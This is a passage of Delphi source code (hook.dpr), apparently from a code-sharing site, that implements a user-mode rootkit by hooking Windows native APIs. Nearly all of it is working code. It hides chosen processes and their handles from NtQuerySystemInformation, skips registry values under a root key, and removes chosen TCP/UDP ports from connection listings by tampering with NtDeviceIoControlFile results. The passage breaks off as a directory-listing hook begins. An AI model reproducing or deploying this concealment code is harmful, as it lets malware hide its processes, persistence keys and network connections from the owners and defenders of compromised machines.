📄 hook.dpr
字号:
end;
GetMem(ObjectInformation, 1);
try
ObjectInformationLength := 1;
while True do
begin
Inc(ObjectInformationLength, 1024);
ReallocMem(ObjectInformation, ObjectInformationLength);
Status := NtQueryObject(Duplicate, ObjectNameInformation, ObjectInformation, ObjectInformationLength, @Bytes);
if Status = NTSTATUS($C0000004) then
Continue
else
Break;
end;
HandleName := WideCharToString(ObjectInformation.Name.Buffer);
finally
FreeMem(ObjectInformation);
end;
if ((lstrcmpi(pchar(HandleName), '\device\tcp') = 0) or (lstrcmpi(pchar(HandleName), '\device\udp') = 0)) then
begin
if HandleEntry.HandleAttributes = 2 then
begin
TdiConnectionInformation.RemoteAddressLength := 4;
if NtDeviceIoControlFileNextHook(Duplicate, 0, nil, nil, @IoStatusBlock, $210012, @TdiConnectionInformation, SizeOf(TDI_CONNECTION_INFORMATION) - $16, @TdiConnectionInfo, SizeOf(TDI_CONNECTION_INFO)) = 0 then
begin
TdiConnectionInformation.RemoteAddressLength := 3;
if NtDeviceIoControlFileNextHook(Duplicate, 0, nil, nil, @IoStatusBlock, $210012, @TdiConnectionInformation, SizeOf(TDI_CONNECTION_INFORMATION), @TdiConnectionInfo, SizeOf(TDI_CONNECTION_INFO)) = 0 then
begin
Port := ntohs(TdiConnectionInfo.ReceivedTsdus and 65535);
if IsId(ProcessId) then
begin
AddPort(Port);
end;
end;
end;
end
else
begin
TdiConnectionInformation.RemoteAddressLength := 3;
NtDeviceIoControlFileNextHook(Duplicate, 0, nil, nil, @IoStatusBlock, $210012, @TdiConnectionInformation, SizeOf(TDI_CONNECTION_INFORMATION), @TdiConnectionInfo, SizeOf(TDI_CONNECTION_INFO));
Port := ntohs(TdiConnectionInfo.ReceivedTsdus and 65535);
if IsId(ProcessId) then
begin
AddPort(Port);
end;
end;
end;
CloseHandle(ProcessHandle);
CloseHandle(Duplicate);
end;
finally
FreeMem(SystemInformation);
end;
end;
function NtQuerySystemInformationHookProc(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation: PVOID; SystemInformationLength: ULONG; ReturnLength: PULONG): NTSTATUS; stdcall;
var
LastProcessInfo, ProcessInfo: PSYSTEM_PROCESSES;
HandleEntry: SYSTEM_HANDLE_TABLE_ENTRY_INFO;
HandleInfo: PSYSTEM_HANDLE_INFORMATION;
HandlesParsed, Offset: dword;
begin
Result := NtQuerySystemInformationNextHook(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
if Result <> 0 then Exit;
if SystemInformationClass = SystemProcessesAndThreadsInformation then
begin
Offset := 0;
LastProcessInfo := nil;
repeat
ProcessInfo := PSYSTEM_PROCESSES(pointer(dword(SystemInformation) + Offset));
if IsId(ProcessInfo.ProcessId) then
begin
if ProcessInfo.NextEntryDelta = 0 then
begin
if LastProcessInfo <> nil then LastProcessInfo.NextEntryDelta := 0;
Exit;
end
else
begin
LastProcessInfo.NextEntryDelta := LastProcessInfo.NextEntryDelta + ProcessInfo.NextEntryDelta;
end;
end
else
begin
LastProcessInfo := ProcessInfo;
end;
Offset := Offset + ProcessInfo.NextEntryDelta;
until ProcessInfo.NextEntryDelta = 0;
end
else if SystemInformationClass = SystemHandleInformation then
begin
HandleInfo := PSYSTEM_HANDLE_INFORMATION(SystemInformation);
HandlesParsed := 0;
while HandlesParsed < HandleInfo.NumberOfHandles do
begin
HandleEntry := HandleInfo.Handles[HandlesParsed];
if IsId(HandleEntry.UniqueProcessId) then
begin
ZeroMemory(@HandleInfo.Handles[HandlesParsed], SizeOf(SYSTEM_HANDLE_INFORMATION));
end;
Inc(HandlesParsed);
end;
end;
end;
function GetValueShift(KeyHandle: dword; Index: ULONG): dword;
var
KeyValueInformation: KEY_VALUE_BASIC_INFORMATION;
ResultLength: ULONG;
ValueLoop: dword;
RootPath: string;
begin
Result := 0;
RootPath := string(Root) + '\';
ValueLoop := 0;
while ValueLoop <= Index do
begin
ZeroMemory(@KeyValueInformation, SizeOf(KEY_VALUE_BASIC_INFORMATION));
if NtEnumerateValueKeyNextHook(KeyHandle, Result, KeyValueBasicInformation, @KeyValueInformation, SizeOf(KEY_VALUE_BASIC_INFORMATION), @ResultLength) <> ERROR_SUCCESS then Break;
byte(pointer(dword(@KeyValueInformation) + ResultLength)^) := 0;
if not StrCmp(RootPath, ExtractFilePath(WideCharToString(PWideChar(@KeyValueInformation.Name)))) then
begin
Inc(ValueLoop);
end;
if ValueLoop > Index then Exit;
Inc(Result);
end;
end;
function NtEnumerateValueKeyHookProc(KeyHandle: HANDLE; Index: ULONG; KeyValueInformationClass: KEY_VALUE_INFORMATION_CLASS; KeyValueInformation: PVOID; KeyValueInformationLength: ULONG; ResultLength: PULONG): NTSTATUS; stdcall;
begin
Result := NtEnumerateValueKeyNextHook(KeyHandle, GetValueShift(KeyHandle, Index), KeyValueInformationClass, KeyValueInformation, KeyValueInformationLength, ResultLength);
end;
function NtDeviceIoControlFileHookProc(FileHandle: HANDLE; Event: HANDLE; ApcRoutine: PIO_APC_ROUTINE; ApcContext: PVOID; IoStatusBlock: PIO_STATUS_BLOCK; IoControlCode: ULONG; InputBuffer: PVOID; InputBufferLength: ULONG; OutputBuffer: PVOID; OutputBufferLength: ULONG): NTSTATUS; stdcall;
type
TDI_CONNECTION_INFO = record
State: ULONG;
Event: ULONG;
TransmittedTsdus: ULONG;
ReceivedTsdus: ULONG;
TransmissionErrors: ULONG;
ReceiveErrors: ULONG;
Throughput: ULONG;
Delay: ULONG;
SendBufferSize: ULONG;
ReceiveBufferSize: ULONG;
Unreliable: BOOL;
end;
PTDI_CONNECTION_INFO = ^TDI_CONNECTION_INFO;
type
TMibTcpRow = record
dwState: DWORD;
dwLocalAddr: DWORD;
dwLocalPort: DWORD;
dwRemoteAddr: DWORD;
dwRemotePort: DWORD;
end;
PMibTcpRow = ^TMibTcpRow;
TMibUdpRow = record
dwLocalAddr: DWORD;
dwLocalPort: DWORD;
end;
PMibUdpRow = ^TMibUdpRow;
TMibTcpRowEx = record
dwState: DWORD;
dwLocalAddr: DWORD;
dwLocalPort: DWORD;
dwRemoteAddr: DWORD;
dwRemotePort: DWORD;
dwProcessId: DWORD;
end;
PMibTcpRowEx = ^TMibTcpRow;
TMibUdpRowEx = record
dwLocalAddr: DWORD;
dwLocalPort: DWORD;
dwProcessId: DWORD;
end;
PMibUdpRowEx = ^TMibUdpRowEx;
var
MibTcpRow, NextMibTcpRow: PMibTcpRow;
MibTcpRowEx, NextMibTcpRowEx: PMibTcpRowEx;
MibUdpRow, NextMibUdpRow: PMibUdpRow;
MibUdpRowEx, NextMibUdpRowEx: PMibUdpRowEx;
Size: dword;
Rows: dword;
begin
Result := NtDeviceIoControlFileNextHook(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength);
if Result <> 0 then Exit;
if IoControlCode = $210012 then
begin
if OutputBufferLength = SizeOf(TDI_CONNECTION_INFO) then
begin
if IsPort(ntohs(PTDI_CONNECTION_INFO(OutputBuffer).ReceivedTsdus and 65535)) then
begin
ZeroMemory(OutputBuffer, OutputBufferLength);
IoStatusBlock.Status := $141;
IoStatusBlock.Information := 0;
end;
end;
end;
if IoControlCode <> $120003 then Exit;
if InputBufferLength = 36 then
begin
if ((pchar(InputBuffer)[1] = #4) and (pchar(InputBuffer)[17] = #1)) then
begin
UpdatePorts;
if pchar(InputBuffer)[0] = #0 then
begin
if pchar(InputBuffer)[16] = #1 then
begin
Size := IoStatusBlock.Information div SizeOf(TMibTcpRow);
Rows := 0;
while Rows < Size do
begin
MibTcpRow := PMibTcpRow(pointer(dword(OutputBuffer) + (Rows * SizeOf(TMibTcpRow))));
if IsPort(ntohs(MibTcpRow.dwLocalPort)) then
begin
NextMibTcpRow := pointer(dword(MibTcpRow) + SizeOf(TMibTcpRow));
CopyMemory(MibTcpRow, NextMibTcpRow, IoStatusBlock.Information - (dword(NextMibTcpRow) - dword(OutputBuffer)));
Dec(IoStatusBlock.Information, SizeOf(TMibTcpRow));
Size := IoStatusBlock.Information div SizeOf(TMibTcpRow);
end
else
begin
Inc(Rows);
end;
end;
end
else if pchar(InputBuffer)[16] = #2 then
begin
Size := IoStatusBlock.Information div SizeOf(TMibTcpRowEx);
Rows := 0;
while Rows < Size do
begin
MibTcpRowEx := PMibTcpRowEx(pointer(dword(OutputBuffer) + (Rows * SizeOf(TMibTcpRowEx))));
if IsPort(ntohs(MibTcpRowEx.dwLocalPort)) then
begin
NextMibTcpRowEx := pointer(dword(MibTcpRowEx) + SizeOf(TMibTcpRowEx));
CopyMemory(MibTcpRowEx, NextMibTcpRowEx, IoStatusBlock.Information - (dword(NextMibTcpRowEx) - dword(OutputBuffer)));
Dec(IoStatusBlock.Information, SizeOf(TMibTcpRowEx));
Size := IoStatusBlock.Information div SizeOf(TMibTcpRowEx);
end
else
begin
Inc(Rows);
end;
end;
end;
end
else if pchar(InputBuffer)[0] = #1 then
begin
if pchar(InputBuffer)[16] = #1 then
begin
Size := IoStatusBlock.Information div SizeOf(TMibUdpRow);
Rows := 0;
while Rows < Size do
begin
MibUdpRow := PMibUdpRow(pointer(dword(OutputBuffer) + (Rows * SizeOf(TMibUdpRow))));
if IsPort(ntohs(MibUdpRow.dwLocalPort)) then
begin
NextMibUdpRow := pointer(dword(MibUdpRow) + SizeOf(TMibUdpRow));
CopyMemory(MibUdpRow, NextMibUdpRow, IoStatusBlock.Information - (dword(NextMibUdpRow) - dword(OutputBuffer)));
Dec(IoStatusBlock.Information, SizeOf(TMibUdpRow));
Size := IoStatusBlock.Information div SizeOf(TMibUdpRow);
end
else
begin
Inc(Rows);
end;
end;
end
else if pchar(InputBuffer)[16] = #2 then
begin
Size := IoStatusBlock.Information div SizeOf(TMibUdpRowEx);
Rows := 0;
while Rows < Size do
begin
MibUdpRowEx := PMibUdpRowEx(pointer(dword(OutputBuffer) + (Rows * SizeOf(TMibUdpRowEx))));
if IsPort(ntohs(MibUdpRowEx.dwLocalPort)) then
begin
NextMibUdpRowEx := pointer(dword(MibUdpRowEx) + SizeOf(TMibUdpRowEx));
CopyMemory(MibUdpRowEx, NextMibUdpRowEx, IoStatusBlock.Information - (dword(NextMibUdpRowEx) - dword(OutputBuffer)));
Dec(IoStatusBlock.Information, SizeOf(TMibUdpRowEx));
Size := IoStatusBlock.Information div SizeOf(TMibUdpRowEx);
end
else
begin
Inc(Rows);
end;
end;
end;
end;
end;
end;
end;
function NtQueryDirectoryFileHookProc(FileHandle: HANDLE; Event: HANDLE; ApcRoutine: PIO_APC_ROUTINE; ApcContext: PVOID; IoStatusBlock: PIO_STATUS_BLOCK; FileInformation: PVOID; FileInformationLength: ULONG; FileInformationClass: FILE_INFORMATION_CLASS; ReturnSingleEntry: ByteBool; FileName: PUNICODE_STRING; RestartScan: ByteBool): NTSTATUS; stdcall;
var
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -